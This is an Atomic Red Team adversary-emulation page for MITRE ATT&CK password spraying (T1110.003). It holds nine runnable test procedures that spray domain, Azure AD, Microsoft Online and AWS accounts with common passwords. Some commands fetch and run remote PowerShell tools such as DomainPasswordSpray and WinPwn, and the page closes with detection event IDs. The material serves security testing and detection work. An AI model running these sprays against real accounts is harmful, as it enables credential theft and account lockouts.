# T1110.003 - Password Spraying
Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)

Typically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

## Atomic Tests

### Atomic Test #1 - Password Spray all Domain Users
CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `command_prompt`!
##### Description: List of domain users to password spray must exits at %temp%\users.txt

##### Check Prereq Commands:
```cmd
if not exist %temp%\users.txt (exit /b 1)

```
##### Get Prereq Commands:
```cmd
"PathToAtomicsFolder\T1110.003\src\parse_net_users.bat"

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "Spring2020" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\IPC$ > NUL
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 1

### Atomic Test #2 - Password Spray (DomainPasswordSpray)Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain

https://github.com/dafthack/DomainPasswordSpray
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/94cb72506b9e2768196c8b6a4b7af63cebc47d88/DomainPasswordSpray.ps1' -UseBasicParsing); Invoke-DomainPasswordSpray -Password Spring2017 -Domain $Env:USERDOMAIN -Force
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 2

### Atomic Test #3 - Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos

Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {
  Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
  exit 1
}

$DomainUsers = Get-ADUser -LDAPFilter '(&(sAMAccountType=805306368)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' -Server $env:UserDnsDomain | Select-Object -ExpandProperty SamAccountName

[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389)

$DomainUsers | Foreach-Object {
  $user = $_
  $password = 'P@ssw0rd!'

  $credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
  try {
    Write-Host " [-] Attempting ${password} on account ${user}."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of password spraying"
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 3

### Atomic Test #4 - Password spray all Azure AD users with a single password
Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
Valid credentials are only needed to fetch the list of Azure AD users.

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: AzureAD module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name AzureAD
$PWord = ConvertTo-SecureString -String "iamthebatman" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "bruce.wayne@contoso.com", $Pword
Connect-AzureAD -Credential $Credential > $null

($Users = Get-AzureADUser -All $true) > $null
Disconnect-AzureAD > $null
$PWord = ConvertTo-SecureString -String "P@ssw0rd!" -AsPlainText -Force

$Users | Foreach-Object {
  $user = $_.UserPrincipalName
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword
  try {
    Write-Host " [-] Attempting P@ssw0rd! on account ${user}."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] ${user}:P@ssw0rd! are valid credentials!`r`n"
    Disconnect-AzureAD > $null
  } catch {
    Write-Host " [-] ${user}:P@ssw0rd! invalid credentials.`r`n"
  }
}
Write-Host "End of password spraying"
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 4

### Atomic Test #5 - WinPwn - DomainPasswordSpray AttacksDomainPasswordSpray Attacks technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
domainpassspray -consoleoutput -noninteractive -emptypasswords```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 5

### Atomic Test #6 - Password Spray Invoke-DomainPasswordSpray Light
Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray) 
but without all the extra code that makes the script get blocked by many AVs. 
This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Username file must exist at $env:Temp\usersdpsLight.txt

##### Check Prereq Commands:
```powershell
if (Test-Path  $env:Temp\usersdpsLight.txt) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
Write-Host -NoNewLine "Reading Users." # this code modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration
$netOutput = net users /domain
$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])
$userLimit = 200; $usercount = 0
foreach ($line in $netOutput) {
  if($usercount -ge $userLimit){break}
  $line = $line.trim()
  $line = $line -split '\s\s+'
  foreach ($user in $line){
    if($usercount -ge $userLimit){break}
    Add-Content $env:Temp\usersdpsLight.txt $user
    $usercount = $usercount + 1
    }  
}
Write-Host "Usernames saved to $env:Temp\usersdpsLight.txt"

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
function Invoke-dpsLight ($Password, $userlist) {
$users = Get-Content $userlist
$Domain = "LDAP://" + ([ADSI]"").distinguishedName
foreach ($User in $users) {
  $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)
  if ($Domain_check.name -ne $null) {
    Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password"
  }
  else { Write-Host ". " -NoNewline}
}
Write-Host -ForegroundColor green "Finished"
}
Invoke-dpsLight "Spring2020" $env:Temp\usersdpsLight.txt
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 6

### Atomic Test #7 - Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)
This test attempts to brute force a list of Microsoft Online (Azure/O365) users with a single password via the MSOLSpray Powershell module.

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads.

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://raw.githubusercontent.com/dafthack/MSOLSpray/922f159104fb3ec77c9fc6507a6388a05c227b5f/MSOLSpray.ps1" -outfile "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
import-module "PathToAtomicsFolder\..\ExternalPayloads\MSOLSpray.ps1"
Invoke-MSOLSpray -UserList "$env:temp\T1110.003UserList.txt" -Password "P@ssword1"
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 7

### Atomic Test #8 - Password Spray using Kerbrute Tool
Test a single password against a list of users

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"

```
##### Description: passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/src/passwordspray.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt"

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 8 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe passwordspray --dc $ENV:userdnsdomain -d $ENV:userdomain "PathToAtomicsFolder\..\ExternalPayloads\passwordspray.txt" password132 
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 8

### Atomic Test #9 - AWS - Password Spray an AWS using GoAWSConsoleSpray
GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/

**Supported Platforms:** iaas:aws

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Check if go is installed

##### Check Prereq Commands:
```sh
go version

```
##### Get Prereq Commands:
```sh
echo Install GO

```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 9 -GetPreReqs

#### Attack Commands: Run with `sh`
```sh
cd /tmp
git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git
cd /tmp/GoAWSConsoleSpray
go run main.go GoAWSConsoleSpray -a XXXXXXXX -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 9

#### Cleanup: 
```sh
rm -rf /tmp/GoAWSConsoleSpray
```

In [ ]:
Invoke-AtomicTest T1110.003 -TestNumbers 9 -Cleanup

## Detection
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Specifically, monitor for many failed authentication attempts across various accounts that may result from password spraying attempts.

Consider the following event IDs:(Citation: Trimarc Detecting Password Spraying)

* Domain Controllers: "Audit Logon" (Success & Failure) for event ID 4625.
* Domain Controllers: "Audit Kerberos Authentication Service" (Success & Failure) for event ID 4771.
* All systems: "Audit Logon" (Success & Failure) for event ID 4648.